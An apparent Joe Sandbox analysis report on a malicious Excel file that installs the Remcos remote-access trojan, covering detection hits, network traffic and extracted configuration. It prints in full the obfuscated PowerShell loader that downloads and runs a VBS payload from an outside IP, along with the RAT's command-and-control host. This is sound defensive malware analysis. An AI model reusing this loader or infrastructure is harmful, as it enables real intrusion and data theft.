                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , ProcessId: 3936, ProcessName: wscript.exe
                  Sigma detected: Dynamic CSharp Compile Artefact
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3720, TargetFilename: C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3312, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))", CommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgI
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3720, TargetFilename: C:\Users\user\AppData\Local\Temp\wma5vyw1.4zt.ps1

                  Data Obfuscation

                  barindex
                  Sigma detected: Dot net compiler compiles file from suspicious location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", ProcessId: 3840, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 56 E7 E9 B6 89 90 F0 48 10 C0 5C 93 B3 0D E0 10 36 C8 8F 70 B2 34 03 42 67 0B 25 61 F3 8C 4E 8D CC 6D F7 B5 39 60 88 40 BE 58 91 10 A0 6F AA 0F 54 DC 28 B8 43 CA B7 9E 41 AA 8F 6C B7 90 9C C9 3B A5 AD 49 3B 4F 60 FB DC 19 14 0C 4D 8F B4 CD 6A A9 61 A4 4C 03 2C AB 60 57 61 11 32 84 F3 A7 D6 97 28 C3 2A E9 20 9E 31 2C AB 85 7B B1 0B E9 89 45 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 1200, TargetObject: HKEY_CURRENT_USER\Software\Rmc-Z4DJFI\exepath

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:00:57.033630+010020241971A Network Trojan was detected142.93.65.16180192.168.2.2249166TCP
                  2024-12-03T14:01:01.567149+010020241971A Network Trojan was detected142.93.65.16180192.168.2.2249168TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:00:57.033411+010020244491Attempted User Privilege Gain192.168.2.2249166142.93.65.16180TCP
                  2024-12-03T14:01:01.567076+010020244491Attempted User Privilege Gain192.168.2.2249168142.93.65.16180TCP
                  2024-12-03T14:01:23.117892+010020244491Attempted User Privilege Gain192.168.2.2249175142.93.65.16180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:01:40.318974+010020204251Exploit Kit Activity Detected142.93.65.16180192.168.2.2249177TCP
                  2024-12-03T14:01:54.412303+010020204251Exploit Kit Activity Detected142.93.65.16180192.168.2.2249181TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:01:40.318974+010020204241Exploit Kit Activity Detected142.93.65.16180192.168.2.2249177TCP
                  2024-12-03T14:01:54.412303+010020204241Exploit Kit Activity Detected142.93.65.16180192.168.2.2249181TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:01:43.467133+010020365941Malware Command and Control Activity Detected192.168.2.224917831.13.224.724044TCP
                  2024-12-03T14:01:45.963112+010020365941Malware Command and Control Activity Detected192.168.2.224917931.13.224.724044TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:00:52.957814+010020576351A Network Trojan was detected142.93.65.16180192.168.2.2249177TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:01:38.675522+010020490381A Network Trojan was detected151.101.65.137443192.168.2.2249176TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:01:46.425588+010028033043Unknown Traffic192.168.2.2249180178.237.33.5080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:00:52.957814+010028582951A Network Trojan was detected142.93.65.16180192.168.2.2249177TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:01:39.948886+010028587961A Network Trojan was detected192.168.2.2249177142.93.65.16180TCP
                  2024-12-03T14:01:53.979899+010028587961A Network Trojan was detected192.168.2.2249181142.93.65.16180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T14:01:11.531099+010028587951A Network Trojan was detected192.168.2.2249169142.93.65.16180TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["lonan.duckdns.org:4044:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-Z4DJFI", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Multi AV Scanner detection for submitted file
                  Source: 0200011080.xlsReversingLabs: Detection: 13%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR
                  Machine Learning detection for sample
                  Source: 0200011080.xlsJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,29_2_00404423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,32_2_0043293A
                  Source: CasPol.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00406764 _wcslen,CoGetObject,32_2_00406764

                  Phishing

                  barindex
                  Yara detected HtmlPhish44
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].hta, type: DROPPED
                  Source: unknownHTTPS traffic detected: 151.101.65.137:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49167 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49173 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49174 version: TLS 1.2
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.pdb source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.pdbhP source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.pdb source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.pdbhP source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.474546983.000000001C398000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040AE51 FindFirstFileW,FindNextFileW,29_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,32_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,32_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,32_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0044D5E9 FindFirstFileExA,32_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,32_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00406AC2 FindFirstFileW,FindNextFileW,32_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,32_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,32_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,32_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,32_2_00406F06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: global trafficDNS query: name: short.ruksk.com
                  Source: global trafficDNS query: name: short.ruksk.com
                  Source: global trafficDNS query: name: short.ruksk.com
                  Source: global trafficDNS query: name: res.cloudinary.com
                  Source: global trafficDNS query: name: short.ruksk.com
                  Source: global trafficDNS query: name: res.cloudinary.com
                  Source: global trafficDNS query: name: short.ruksk.com
                  Source: global trafficDNS query: name: short.ruksk.com
                  Source: global trafficDNS query: name: res.cloudinary.com
                  Source: global trafficDNS query: name: res.cloudinary.com
                  Source: global trafficDNS query: name: apamanollonan.duckdns.org
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
